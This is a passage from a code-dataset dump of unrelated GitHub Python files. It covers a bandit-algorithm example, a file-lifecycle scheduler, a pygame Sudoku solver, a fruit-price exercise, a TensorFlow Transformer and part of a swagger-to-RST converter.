0.15])\n        # BernTS\n        ts = BernoulliThompsonSampling(bandits=bernoulli_bandits, bandit_type = \"BernTS\")\n        BernTS_return, BernTS_actions = ts.simulate(time=times)\n        bernoulli_bandits.plot_true_mean_vs_estimation(pic_name=pic_name, y_axis = 'theta_hat')\n\n        # BernGreedy\n        ts = BernoulliThompsonSampling(bandits=bernoulli_bandits, bandit_type = \"BernGreedy\")\n        BernGreedy_return, BernGreedy_actions = ts.simulate(time=times)\n\n        CompareAllBanditsAlgos(time_steps=times).plot_returns(pd.DataFrame({\n            'BernTS':np.cumsum(BernTS_return), 'BernGreedy':np.cumsum(BernGreedy_return)}) )\n        CompareAllBanditsAlgos(time_steps=times).plot_action_taken(pd.DataFrame({ \n            'BernTS':BernTS_actions, 'BernGreedy':BernGreedy_actions}))\n# \"\"\"\n\ndef main(arms=5, number_of_trials=5, time_steps=None, q_mean=None, q_sd=None, initial=0, images_dir='images'):\n    \"\"\"Runs the main script\"\"\"\n    logger.info(\"Starting CompareAllBanditsAlgos MAB\")\n    test_all = CompareAllBanditsAlgos(\n        arms=arms, number_of_trials=number_of_trials,\n        time_steps=time_steps, \n        q_mean=q_mean, q_sd=q_sd, images_dir=images_dir)\n    \n    test_all.test_algo(OnlyExploration)\n    test_all.test_algo(OnlyExploitation)\n    # test_all.test_algo(GaussianThompsonSampling)\n    test_all.test_algo(GBA)\n    for epsilon in [.9]:\n        test_all.test_algo(Greedy, epsilon=epsilon, col_name = f\"Greedy \\u03B5 {epsilon}\")\n        test_all.test_algo(UCB, UCB_param=epsilon, col_name = f\"UCB \\u03B5 {epsilon}\")\n        if initial>0:\n            test_all.test_algo(Greedy, epsilon=epsilon, col_name = f\"Optimistic \\u03B5 {epsilon}\", initial=initial)\n    tot_return, best_actions = test_all.return_dfs()\n    test_all.plot_returns(tot_return)\n    test_all.plot_action_taken(best_actions)\n\n\nif __name__ == \"__main__\":\n    bandits = Bandits(number_of_arms = 4, q_mean=[1,2,3,4], q_sd=[0.0, 0.0, 0.0, 0.0])\n    bandits.plot_bandits()\n    for mab_examples in MABExamples.__subclasses__():\n        mab_examples().mab(bandits, pic_name=f\"{mab_examples.__name__}\", times=100)\n\n    # Example 1\n    main(arms=4, number_of_trials=250, time_steps=75, q_mean=[1,2,3,4], q_sd=[0.0, 0.0, 0.0, 0.0], initial=20)\n\n    # Example 2\n    main(arms=10, number_of_trials=250, time_steps=50, images_dir=\"images2\", initial=3)","repo_name":"MattiaCinelli/AlgoRL","sub_path":"examples/MAB.py","file_name":"MAB.py","file_ext":"py","file_size_in_byte":6991,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"36558797874","text":"# -*- coding: utf-8 -*-\nfrom config.logconfig import notifier_logger as logger\nimport time\nimport os\nimport datetime\nimport calendar\n\n\ndef is_dir_expiration(handle_time, last_exec_time, handle_type, handle_value):\n    \"\"\"\n    Decide whether the scheduled execution condition is met\n    :param handle_time: checked on the first run, format %H:%M\n    :param last_exec_time: time of the previous run; later runs compare last run time + interval with the current time\n    :param handle_type: schedule period type (day, week, month)\n    :param handle_value: schedule value\n    :return: bool\n    \"\"\"\n    ret = False\n    try:\n        cur_timestamp = int(time.time())\n        # run every n days\n        if handle_type == 0:  # day\n            today = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))  # e.g. 2020-06-19\n            handle_time_str = \"%s %s:00\" % (today, str(handle_time))  # e.g. 2020-06-19 09:12:00\n            secs_per_day = int(24 * 60 * 60)  # one day\n            interval_seconds = int(handle_value) * secs_per_day  # schedule interval in seconds\n            if last_exec_time == '' and handle_time != '':  # first check\n                handle_time_secs = int(time.mktime(time.strptime(str(handle_time_str), \"%Y-%m-%d %H:%M:%S\")))  # seconds since epoch\n                if cur_timestamp >= handle_time_secs:\n                    ret = True\n            elif last_exec_time != '':\n                last_exec_time_secs = int(time.mktime(time.strptime(last_exec_time, \"%Y-%m-%d %H:%M:%S\")))  # time of the previous check\n                if last_exec_time_secs + interval_seconds <= cur_timestamp:  # interval reached\n                    ret = True\n\n        # run weekly at a fixed time\n        elif handle_type == 1:\n            weekday = datetime.datetime.now().isoweekday()  # e.g. Friday == 5\n            if weekday == int(handle_value):\n                handle_time_str = str(handle_time)  # time of the first check\n                now = time.strftime(\"%H-%M\", time.localtime(time.time()))  # current time, e.g. 09:20\n                ret = is_timeout(now, handle_time_str)  # has the scheduled time passed?\n\n        # run monthly at a fixed time\n        elif handle_type == 2:\n            now_day = datetime.datetime.now().day\n            now_month = datetime.datetime.now().month\n            max_day = calendar.mdays[now_month]  # number of days in this month\n            handle_day = int(handle_value)  # schedule value\n            if handle_day > max_day:\n                handle_day = max_day\n            if now_day == handle_day:  # only run on the scheduled day\n                handle_time_str = str(handle_time)\n                now = time.strftime(\"%H-%M\", time.localtime(time.time()))\n                ret = is_timeout(now, handle_time_str)  # True if the current time is past the scheduled check time\n    except Exception as error:\n        logger.error(\"FileLifeCycle: is_dir_expiration: %s\" % error)\n    return ret\n\n\ndef is_timeout(now, handle_time_str):\n    \"\"\"\n    Check whether the scheduled time has passed\n    :param now:%H-%M\n    :param handle_time_str:%H:%M\n    :return: bool\n    \"\"\"\n    ret = False\n    try:\n        handle_hour = handle_time_str.split(\":\")[0]\n        handle_minute = handle_time_str.split(\":\")[1]\n        now_hour = now.split(\"-\")[0]\n        now_minute = now.split(\"-\")[1]\n        if handle_hour[0] == \"0\":\n            handle_hour = handle_hour[1]\n        if handle_minute[0] == \"0\":\n            handle_minute = handle_minute[1]\n        if now_hour[0] == \"0\":\n            now_hour = now_hour[1]\n        if now_minute[0] == \"0\":\n            now_minute = now_minute[1]\n        now_hour_int = int(now_hour)\n        now_minute_int = int(now_minute)\n        handle_hour_int = int(handle_hour)\n        handle_minute_int = int(handle_minute)\n        if now_hour_int > handle_hour_int:\n            ret = True\n        elif now_hour_int == handle_hour_int and now_minute_int >= handle_minute_int:\n            ret = True\n    except Exception as error:\n        logger.error(\"FileLifeCycle: is_timeout: %s\" % error)\n    return ret\n\n# use absolute paths\ndef list_all_files(root_dir):\n    \"\"\"\n    function: list all files under a directory and return them as a list\n    @param root_dir: root directory\n    @return: list of file names\n    \"\"\"\n    files = []\n    depth = os.listdir(root_dir)\n    for i in range(0, len(depth)):\n        path = os.path.join(root_dir, depth[i])\n        if os.path.isdir(path):\n            files.extend(list_all_files(path))\n        if os.path.isfile(path):\n            files.append(path)\n    return files\n\n\n","repo_name":"xiaoluo260/gluster","sub_path":"file_life_cycle/src/Notifier/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73744984693","text":"import pygame, copy, sys, logging\nfrom sudoku_solver import is_num, get_map, check_hor, check_ver, check_square\nimport time\nfrom components.display_board import display_board\nfrom pygame_init import *\nimport pygame_init\n\nglobal solving\n\n# initialise UI state flags up front so their first read cannot raise a\n# NameError if pygame_init does not already define them\nrunning = True\nclick_lock = False\n\ndef setup_reference():\n    for i in range(9):\n        for j in range(9):\n            if board[i][j] != 0:\n                board_reference[i][j] = 1\n\ndef button(pos, dim, text, text_offset, fun, width):\n    mouse_pos = pygame.mouse.get_pos()\n    global click_lock\n\n    if pygame.mouse.get_pressed()[0] is False:\n        click_lock = False\n\n    if (mouse_pos[0] > pos[0] and mouse_pos[0] < pos[0] + dim[0]) and (mouse_pos[1] > pos[1] and mouse_pos[1] < pos[1] + dim[1]):\n        pygame.draw.rect(screen, pygame.Color(255, 255, 255), (pos[0], pos[1], dim[0], dim[1]))\n        if click_lock is False and pygame.mouse.get_pressed()[0] is True:\n            fun()\n            click_lock = True\n        screen.blit(my_font.render(text, False, (0, 0, 0)), (pos[0] 
+ text_offset[0], pos[1] + text_offset[1]))\n    else:\n        pygame.draw.rect(screen, pygame.Color(255, 255, 255), (pos[0], pos[1], dim[0], dim[1]), width)\n        screen.blit(my_font.render(text, False, (255, 255, 255)), (pos[0] + text_offset[0], pos[1] + text_offset[1]))\n\ndef reset():\n    for i in range(9):\n        for j in range(9):\n            if board_reference[i][j] == 0:\n                board[i][j] = 0\n\ndef solve():\n    reset()\n    pygame_init.solving = True\n    print(pygame_init.solving)\n    recursive_solve(board, 0, 0)\n\ndef get_highlight_position(x, y):\n    y_pos = (y + 1) * 60 - 5 * y\n    y_pos += 10 if y >= 3 else 0\n    y_pos += 10 if y >= 6 else 0\n    x_pos = x * 60 + 20 - (5 * x)\n    x_pos += 10 if x >= 3 else 0\n    x_pos += 10 if x >= 6 else 0\n    return x_pos + 4, y_pos + 4\n\ndef highlight_cell(x, y, cell_color, value_color):\n    pos = get_highlight_position(x, y)\n    pygame.draw.rect(screen, cell_color, (pos[0], pos[1], 52, 52))\n    screen.blit(my_font.render(str(board[y][x]), False, value_color), (pos[0] + 15, pos[1] + 4))\n    time.sleep(0.2)\n\ndef recursive_solve(board, x, y):\n    global running  # without this, the QUIT handler below only set a local variable\n    if x == 9:\n        x = 0\n        y += 1\n        if y == 9:\n            return True\n    while board[y][x] != 0:\n        x += 1\n        if x == 9:\n            x = 0\n            y += 1\n        if y == 9:\n            return True\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n    for i in range(9):\n        board[y][x] += 1\n        if check_hor(board, x, y) is True and check_ver(board, x, y) is True and check_square(board, x, y) is True:\n            display_board()\n\n            highlight_cell(x, y, pygame.Color(255, 255, 255), pygame.Color(0, 200, 0))\n\n            refresh_screen()\n            if recursive_solve(board, x + 1, y) is True:\n                return True\n    board[y][x] = 0\n    return False\n\ndef refresh_screen():\n    pygame.display.flip()\n    screen.fill(\"black\")\n    clock.tick(60)\n\n\ndef game_loop():\n    global running\n\n    while running:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                running = False\n        display_buttons()\n        display_board()\n        refresh_screen()\n\ndef exit_game():\n    global running\n    running = False\n\ndef display_buttons():\n    button((570, 200), (200, 50), 'Solve', (45, 2), solve, 3)\n    button((570, 300), (200, 50), 'Reset', (45, 2), reset, 3)\n    button((570, 400), (200, 50), 'Exit', (65, 2), exit_game, 3)\n\ndef init():\n    global screen\n    global clock\n\n    setup_check_board()\n    setup_reference()\n\n    pygame.init()\n\n    game_loop()\n    pygame.quit()\n\nwith open(get_map(), \"r\") as f:\n    file_map = f.read()\n    f.close()\n\n\ndef setup_check_board():\n    global board\n\n    k = 0\n    for i in range(9):\n        for j in range(9):\n            try:\n                board[i][j] = int(file_map[k])\n                k += 2\n            except (ValueError, IndexError):\n                logging.error('Invalid map format')\n                exit()\n\ninit()","repo_name":"GarnierLenny/Pydoku","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2673193273","text":"\"\"\"A fruit stand sells fruit using the following price table:\n Up to 5 Kg Above 5 Kg\nStrawberry R$ 2.50 per Kg R$ 2.20 per Kg\nApple R$ 1.80 per Kg R$ 1.50 per Kg\n\nIf the customer buys more than 8 Kg of fruit, or the total purchase exceeds R$ 25.00, they also receive a 10%\ndiscount on that total. Write an algorithm that reads the quantity (in Kg) of strawberries and the quantity (in Kg) of apples\npurchased, and prints the amount the customer has to pay.\n\"\"\"\n\nqtd_em_kg_morango = float(input('Enter the quantity of strawberries in Kg: '))\nqtd_em_kg_macas = float(input('Enter the quantity of apples in Kg: '))\n\nif qtd_em_kg_morango <= 5:\n    preco_total_morangos = qtd_em_kg_morango * 2.50\nelse:\n    preco_total_morangos = qtd_em_kg_morango * 2.20\n\nif qtd_em_kg_macas <= 5:\n    preco_total_macas = qtd_em_kg_macas * 1.80\nelse:\n    preco_total_macas = qtd_em_kg_macas * 1.50\n\npeso_total_frutas = qtd_em_kg_macas + qtd_em_kg_morango\npreco_total_frutas = preco_total_macas + preco_total_morangos\n\nif peso_total_frutas > 8 or preco_total_frutas > 25:\n    preco_total_frutas *= 0.9\n\nprint(f'Total price: R$ {preco_total_frutas:.2f}')\n","repo_name":"mateuslourenco/exericicios-wiki-python","sub_path":"Estrutura de Decisão/ex_27.py","file_name":"ex_27.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1649247382","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nfrom layers import *\n\nclass Transformer(tf.keras.Model):\n    def __init__(self, num_layers, d_model, binary_size, dff, pos, \n                 target_vocab_size, make_sym, use_pos, out_num, out_pos, res_ratio, rate=0.1):\n        super(Transformer, self).__init__()\n        \n        self.num_layers = num_layers\n        self.NN = point_wise_feed_forward_network(1, dff)\n        self.encoder = Encoder(num_layers, d_model, binary_size, dff, \n                               pos, make_sym, res_ratio, rate)\n\n        self.decoder = Decoder(num_layers, d_model, binary_size, dff, \n                               pos, make_sym, res_ratio, rate)\n        self.emb = tf.keras.layers.Dense(d_model, use_bias=False)\n        self.use_pos = use_pos\n        self.out_num = out_num\n        self.out_pos = out_pos\n        self.final_layer = tf.keras.layers.Dense(target_vocab_size)\n    \n    def call(self, inp, tar, training, enc_padding_mask, \n             com_mask, dec_padding_mask):\n\n        enc_output = self.encoder(inp, training, enc_padding_mask, self.NN, self.emb, self.use_pos)  # (batch_size, inp_seq_len, d_model)\n        # dec_output.shape == (batch_size, tar_seq_len, d_model)\n        dec_output, attention_weights = self.decoder(\n            tar, enc_output, training, com_mask, dec_padding_mask, self.NN, self.emb, self.use_pos)\n\n        final_output = self.final_layer(dec_output)  # (batch_size, tar_seq_len, target_vocab_size)\n        return_list = []\n        if self.out_num:\n            return_list.append(final_output)\n        return_list.append(attention_weights)\n        if self.out_pos:\n            last_att_weights = attention_weights['decoder_layer{}_block2'.format(self.num_layers)]\n            last_att_weights = tf.reshape(last_att_weights, [-1, last_att_weights.shape[1]*last_att_weights.shape[2], last_att_weights.shape[-1]])\n            return_list.append(last_att_weights)\n        return return_list\n\nclass mask_transform(tf.keras.layers.Layer):\n    '''\n    1D Convnet for learning mask transformation\n    '''\n    def __init__(self, num_filters, filter_size, rate=0.1):\n        super(mask_transform, self).__init__()\n        self.CNN = tf.keras.layers.Conv1D(num_filters, filter_size, padding='same', activation='relu')\n        self.final = tf.keras.layers.Dense(1)\n        self.dropout = tf.keras.layers.Dropout(rate)\n    def call(self, x, training):\n        cnn_out = self.CNN(x) ###### batch_size*state_size, seq_len, 2\n        cnn_out = self.dropout(cnn_out,training=training)\n        out = self.final(cnn_out)\n        return tf.squeeze(out, 
axis=-1)","repo_name":"Yujun-Yan/Neural-Execution-Engines","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"3070172629","text":"import json\nimport re\nfrom collections import defaultdict\nfrom functools import partial\nfrom hashlib import md5\nfrom operator import attrgetter\n\nfrom cached_property import cached_property\nfrom jsonschema import (\n validate as schema_validate, FormatChecker, ValidationError, SchemaError)\n\nfrom swg2rst.converter_exceptions import ConverterError\nfrom swg2rst.utils.logger import get_logger\n\n\nPRIMITIVE_TYPES = ('integer', 'number', 'string', 'boolean')\n_DEFAULT_EXAMPLES = {\n 'integer': 1,\n 'number': 1.0,\n 'string': 'somestring',\n 'date': '2015-01-01',\n 'date-time': '2015-01-01T15:00:00.000Z',\n 'boolean': True,\n 'password': '*****',\n}\n\n#: json validation schema for examples file\nexamples_json_schema = {\n 'type': 'object',\n 'properties': {\n 'array_items_count': {\n 'type': 'integer',\n 'minimum': 1,\n 'maximum': 5\n },\n 'types': {\n 'type': 'object',\n 'properties': {\n 'string': {\n 'type': 'string'\n },\n 'date': {\n 'type': 'string',\n 'format': 'date'\n },\n 'date-time': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'integer': {\n 'type': 'integer'\n },\n 'number': {\n 'type': 'number'\n },\n 'boolean': {\n 'type': 'boolean'\n }\n },\n 'additionalProperties': False\n },\n 'definitions': {\n 'type': 'object',\n 'patternProperties': {\n '^#/definitions/\\w+$': {\n 'type': 'object'\n }\n },\n 'additionalProperties': False\n },\n 'paths': {\n 'type': 'object',\n 'patternProperties': {\n '^/': {\n 'type': 'object',\n 'patternProperties': {\n '^[a-z]{,7}$': {\n 'type': 'object',\n 'properties': {\n 'parameters': {\n 'type': 'object'\n },\n 'responses': {\n 'type': 'object'\n }\n },\n 'additionalProperties': False\n }\n },\n 'additionalProperties': False\n }\n },\n 'additionalProperties': False\n }\n },\n 'additionalProperties': False,\n}\n\n\nclass SchemaTypes(object):\n \"\"\" Types of the schema object\n \"\"\"\n INLINE = 'inline'\n DEFINITION = 'definition'\n\n prefixes = {\n INLINE: INLINE[0],\n DEFINITION: DEFINITION[0],\n }\n\n\nclass SecurityTypes(object):\n \"\"\" Types of the security scheme\n \"\"\"\n BASIC = 'basic'\n OAUTH2 = 'oauth2'\n API_KEY = 'apiKey'\n\n names = {\n BASIC: 'HTTP Basic Authentication',\n OAUTH2: 'OAuth 2.0',\n API_KEY: 'API Key',\n }\n\n\nclass Exampilator(object):\n \"\"\" Example Manager\n \"\"\"\n\n DEFAULT_EXAMPLES = _DEFAULT_EXAMPLES.copy()\n CUSTOM_EXAMPLES = dict()\n EXAMPLE_ARRAY_ITEMS_COUNT = 2\n\n logger = get_logger()\n _json_format_checker = FormatChecker()\n\n @classmethod\n def fill_examples(cls, examples):\n\n if 'array_items_count' in examples:\n cls.EXAMPLE_ARRAY_ITEMS_COUNT = examples['array_items_count']\n if 'types' in examples:\n cls.DEFAULT_EXAMPLES.update(examples['types'])\n if 'definitions' in examples:\n for path, fields in examples['definitions'].items():\n for field, value in fields.items():\n key = '.'.join((path, field))\n cls.CUSTOM_EXAMPLES[key] = value\n if 'paths' in examples:\n for path, methods in examples['paths'].items():\n key = \"#/paths/'{}'\".format(path)\n for method, operations in methods.items():\n for section, fields in operations.items():\n for field, value in fields.items():\n _key = '/'.join((key, method, section, field))\n cls.CUSTOM_EXAMPLES[_key] = value\n\n @classmethod\n def 
get_example_value_for_primitive_type(cls, type_, properties, format_, **kw):\n        paths = kw.get('paths')\n        if paths:\n            result, path = cls._get_custom_example(paths)\n            if result:\n                cls._example_validate(path, result, type_, format_)\n                return result\n\n        if properties.get('default') is not None:\n            result = properties['default']\n        elif properties.get('enum'):\n            result = properties['enum'][0]\n        else:\n            result = getattr(cls, '%s_example' % type_)(properties, format_)\n\n        return result\n\n    @classmethod\n    def string_example(cls, properties, type_format):\n        result = cls.DEFAULT_EXAMPLES[type_format or 'string']\n        if properties.get('min_length'):\n            # str.ljust returns a new string, so the result must be reassigned\n            result = result.ljust(properties['min_length'], 'a')\n        if properties.get('max_length'):\n            result = result[:properties['max_length']]\n        return result\n\n    @classmethod\n    def integer_example(cls, properties, *args):\n        result = cls.DEFAULT_EXAMPLES['integer']\n        if properties.get('minimum') is not None and result < properties['minimum']:\n            result = properties['minimum']\n            if properties.get('exclusive_minimum', False):\n                result += 1\n        elif properties.get('maximum') is not None and result > properties['maximum']:\n            result = properties['maximum']\n            if properties.get('exclusive_maximum', False):\n                result -= 1\n        return result\n\n    @classmethod\n    def number_example(cls, properties, *args):\n        return cls.integer_example(properties)\n\n    @classmethod\n    def boolean_example(cls, *args):\n        return cls.DEFAULT_EXAMPLES['boolean']\n\n    @classmethod\n    def get_example_by_schema(cls, schema, ignored_schemas=None, paths=None, name=''):\n        \"\"\" Get example by schema object\n\n        :param Schema schema: current schema\n        :param list ignored_schemas: list of previous schemas\n            to avoid circular references\n        :param list paths: list object paths (ex. #/definitions/Model.property)\n            If nested schemas exist, custom examples are checked in order from paths\n        :param str name: name of property schema object if exists\n        :return: dict or list (if schema is array)\n        \"\"\"\n        if schema.schema_example:\n            return schema.schema_example\n\n        if ignored_schemas is None:\n            ignored_schemas = []\n\n        if paths is None:\n            paths = []\n\n        if name:\n            paths = list(map(lambda path: '.'.join((path, name)), paths))\n\n        if schema.ref_path:\n            paths.append(schema.ref_path)\n\n        if schema.schema_id in ignored_schemas:\n            result = [] if schema.is_array else {}\n        else:\n            schemas = ignored_schemas + [schema.schema_id]\n            kwargs = dict(\n                ignored_schemas=schemas,\n                paths=paths\n            )\n            if schema.is_array:\n                result = cls.get_example_for_array(\n                    schema.item, **kwargs)\n            elif schema.type in PRIMITIVE_TYPES:\n                result = cls.get_example_value_for_primitive_type(\n                    schema.type, schema.raw, schema.type_format, paths=paths\n                )\n            elif schema.all_of:\n                result = {}\n                for _schema_id in schema.all_of:\n                    schema = SchemaObjects.get(_schema_id)\n                    result.update(cls.get_example_by_schema(schema, **kwargs))\n            else:\n                result = cls.get_example_for_object(\n                    schema.properties, **kwargs)\n        return result\n\n    @classmethod\n    def get_body_example(cls, operation):\n        \"\"\" Get example for body parameter by operation\n\n        :param Operation operation: operation object\n        \"\"\"\n        path = \"#/paths/'{0.path}'/{0.method}/parameters/{name}\".format(\n            operation, name=operation.body.name or 'body')\n        return cls.get_example_by_schema(operation.body, paths=[path])\n\n    @classmethod\n    def get_response_example(cls, operation, response):\n        \"\"\" Get example for response object by operation object\n\n        :param Operation operation: operation object\n        :param Response response: 
response object\n \"\"\"\n path = \"#/paths/'{}'/{}/responses/{}\".format(\n operation.path, operation.method, response.name)\n kwargs = dict(paths=[path])\n\n if response.type in PRIMITIVE_TYPES:\n result = cls.get_example_value_for_primitive_type(\n response.type, response.properties, response.type_format, **kwargs)\n else:\n schema = SchemaObjects.get(response.type)\n result = cls.get_example_by_schema(schema, **kwargs)\n\n return result\n\n @classmethod\n def get_header_example(cls, header):\n \"\"\" Get example for header object\n\n :param Header header: Header object\n :return: example\n :rtype: dict\n \"\"\"\n if header.is_array:\n result = cls.get_example_for_array(header.item)\n else:\n example_method = getattr(cls, '{}_example'.format(header.type))\n result = example_method(header.properties, header.type_format)\n return {header.name: result}\n\n @classmethod\n def get_property_example(cls, property_, **kw):\n \"\"\" Get example for property\n\n :param dict property_:\n :return: example value\n \"\"\"\n paths = kw.get('paths', None)\n name = kw.get('name', '')\n result = None\n if name and paths:\n paths = list(map(lambda path: '.'.join((path, name)), paths))\n result, path = cls._get_custom_example(paths)\n if result is not None and property_['type'] in PRIMITIVE_TYPES:\n cls._example_validate(\n path, result, property_['type'], property_['type_format'])\n return result\n\n if SchemaObjects.contains(property_['type']):\n schema = SchemaObjects.get(property_['type'])\n if result is not None:\n if schema.is_array:\n if not isinstance(result, list):\n result = [result] * cls.EXAMPLE_ARRAY_ITEMS_COUNT\n else:\n if isinstance(result, list):\n cls.logger.warning(\n 'Example type mismatch in path {}'.format(schema.ref_path))\n else:\n result = cls.get_example_by_schema(schema, **kw)\n else:\n result = cls.get_example_value_for_primitive_type(\n property_['type'],\n property_['type_properties'],\n property_['type_format'],\n **kw\n )\n return result\n\n @classmethod\n def _get_custom_example(cls, paths):\n if cls.CUSTOM_EXAMPLES:\n for path in paths:\n if path in cls.CUSTOM_EXAMPLES:\n return cls.CUSTOM_EXAMPLES[path], path\n return None, ''\n\n @classmethod\n def get_example_for_array(cls, obj_item, **kw):\n return [cls.get_property_example(obj_item, **kw)] * cls.EXAMPLE_ARRAY_ITEMS_COUNT\n\n @classmethod\n def get_example_for_object(cls, properties, **kw):\n result = {}\n if properties:\n for _property in properties:\n kw['name'] = _property['name']\n result[_property['name']] = cls.get_property_example(\n _property, **kw)\n return result\n\n @classmethod\n def schema_validate(cls, obj, json_schema):\n schema_validate(obj, json_schema, format_checker=cls._json_format_checker)\n\n @classmethod\n def _example_validate(cls, path, value, type_, format_=None):\n _json_schema = {'type': type_}\n if format_:\n _json_schema['format'] = format_\n try:\n cls.schema_validate(value, _json_schema)\n except (ValidationError, SchemaError):\n cls.logger.warning('Example type mismatch in path {}'.format(path))\n\n\nclass SchemaObjects(object):\n \"\"\" Schema collection\n \"\"\"\n\n _schemas = dict()\n\n @classmethod\n def create_schema(cls, obj, name, schema_type, root):\n \"\"\" Create Schema object\n\n :param dict obj: swagger schema object\n :param str name: schema name\n :param str schema_type: schema location.\n Can be ``inline`` or ``definition``\n :param BaseSwaggerObject root: root doc\n :return: new schema\n :rtype: Schema\n \"\"\"\n schema = Schema(obj, schema_type, name=name, root=root)\n 
cls.add_schema(schema)\n return schema\n\n @classmethod\n def add_schema(cls, schema):\n \"\"\" Add schema object to collection\n\n :param Schema schema:\n \"\"\"\n cls._schemas[schema.schema_id] = schema\n\n @classmethod\n def get(cls, schema_id):\n \"\"\" Get schema object from collection by id\n\n :param str schema_id:\n :return: schema\n :rtype: Schema\n \"\"\"\n return cls._schemas.get(schema_id)\n\n @classmethod\n def get_schemas(cls, schema_types=None, sort=True):\n \"\"\"\n Get schemas by type. If ``schema_type`` is None, return all schemas\n\n :param schema_types: list of schema types\n :type schema_types: list or None\n :param bool sort: sort by name\n :return: list of schemas\n :rtype: list\n \"\"\"\n result = filter(lambda x: not x.is_inline_array, cls._schemas.values())\n if schema_types:\n result = filter(lambda x: x.schema_type in schema_types, result)\n if sort:\n result = sorted(result, key=attrgetter('name'))\n return result\n\n @classmethod\n def contains(cls, key):\n \"\"\" Check schema existence in collection by id\n\n :param str key:\n :rtype: bool\n \"\"\"\n return key in cls._schemas\n\n @classmethod\n def clear(cls):\n cls._schemas = dict()\n\n @classmethod\n def get_type_description(cls, _type, *args, **kwargs):\n \"\"\" Get description of type\n\n :param str _type:\n :param post_callback:\n :rtype: str\n \"\"\"\n if not cls.contains(_type):\n return _type\n\n schema = cls.get(_type)\n if schema.all_of:\n models = ', '.join(map(\n partial(cls.get_type_description, *args, **kwargs), schema.all_of))\n result = '({})'.format(models)\n elif schema.is_array:\n result = 'array of {}'.format(\n cls.get_type_description(schema.item['type'], *args, **kwargs))\n else:\n result = schema.name\n if kwargs.get('post_callback'):\n result = kwargs['post_callback'](result, schema, *args, **kwargs)\n return result\n\n\nclass SecurityMixin(object):\n\n security = None\n\n def _fill_securities(self, obj):\n self.security = {}\n for security in obj:\n self.security.update(security)\n\n\nclass BaseSwaggerObject(SecurityMixin):\n \"\"\" Represents Swagger Object\n \"\"\"\n raw = None\n\n #: Operation collection\n #:\n #: key: operation_id, value: Operation object\n operations = None\n\n #: Operations grouped by tags\n #:\n #: key: tag name, value: list of Operation object\n tags = None\n\n schemas = SchemaObjects\n\n #: Parameter definitions from Parameters Definitions Object\n #:\n #: key: reference path, value: Parameter object\n parameter_definitions = None\n\n #: Response definitions from Responses Definitions Object\n #:\n #: key: reference path, value: Response object\n response_definitions = None\n\n #: Security definitions from Security Definitions Object\n #:\n #: key: security name, value: SecurityDefinition object\n security_definitions = None\n\n #: Represents tag descriptions from Swagger Tag Object\n #:\n #: key: tag name, value: dict with keys ``description`` and ``externalDocs``\n tag_descriptions = None\n\n #: Example Manager. 
Must be subclass of Exampilator\n exampilator = None\n\n def __init__(self, obj, exampilator=None, examples=None):\n if obj['swagger'] != '2.0':\n raise ConverterError('Invalid Swagger version')\n\n self.raw = obj\n self.exampilator = exampilator or Exampilator\n assert issubclass(self.exampilator, Exampilator)\n if examples:\n try:\n self.exampilator.schema_validate(examples, examples_json_schema)\n except ValidationError as err:\n raise ConverterError(err.message)\n\n self.exampilator.fill_examples(examples)\n\n if 'definitions' in obj:\n self._fill_schemas_from_definitions(obj['definitions'])\n\n if 'parameters' in obj:\n self._fill_parameter_definitions(obj['parameters'])\n\n if 'responses' in obj:\n self._fill_response_definitions(obj['responses'])\n\n if 'securityDefinitions' in obj:\n self._fill_security_definitions(obj['securityDefinitions'])\n\n if 'security' in obj:\n self._fill_securities(obj['security'])\n\n self.info = obj['info']\n self.host = obj.get('host', '')\n self.base_path = obj.get('basePath', '')\n self.consumes = obj.get('consumes', ['application/json'])\n self.produces = obj.get('produces', ['application/json'])\n self.schemes = obj.get('schemes', ['http'])\n self._fill_operations()\n self.external_docs = obj.get('externalDocs')\n\n def _fill_operations(self):\n self.operations = {}\n self._fill_tag_descriptions()\n self.tags = defaultdict(list)\n for path, operations in self.raw['paths'].items():\n path_params = []\n for param in operations.get('parameters', []):\n if param.get('$ref'):\n path_params.append(self.parameter_definitions[param['$ref']])\n else:\n path_params.append(\n Parameter(param, name=param['name'], root=self))\n for method, operation in operations.items():\n if method == 'parameters':\n continue\n op = Operation(operation, method, path, self, path_params)\n self.operations[op.operation_id] = op\n for tag in op.tags:\n self.tags[tag].append(op)\n\n def _fill_tag_descriptions(self):\n if 'tags' in self.raw:\n self.tag_descriptions = {}\n for tag in self.raw['tags']:\n if 'description' in tag or 'externalDocs' in tag:\n self.tag_descriptions[tag['name']] = {\n 'description': tag.get('description'),\n 'externalDocs': tag.get('externalDocs')\n }\n\n def _fill_schemas_from_definitions(self, obj):\n self.schemas.clear()\n for name, definition in obj.items():\n self.schemas.create_schema(\n definition, name, SchemaTypes.DEFINITION, root=self)\n\n def _fill_parameter_definitions(self, obj):\n self.parameter_definitions = {}\n for name, parameter in obj.items():\n key = '#/parameters/{}'.format(name)\n self.parameter_definitions[key] = Parameter(\n parameter, name=parameter['name'], root=self)\n\n def _fill_response_definitions(self, obj):\n self.response_definitions = {}\n for name, response in obj.items():\n key = '#/responses/{}'.format(name)\n self.response_definitions[key] = Response(\n response, name=name, root=self)\n\n def _fill_security_definitions(self, obj):\n self.security_definitions = {\n name: SecurityDefinition(name, _obj) for name, _obj in obj.items()\n }\n\n def get_type_description(self, _type, *args, **kwargs):\n \"\"\" Get description of type\n\n :param str _type:\n :rtype: str\n \"\"\"\n return self.schemas.get_type_description(_type, *args, **kwargs)\n\n\nclass Operation(SecurityMixin):\n \"\"\" Represents Swagger Operation Object\n \"\"\"\n parameters = None\n responses = None\n method = 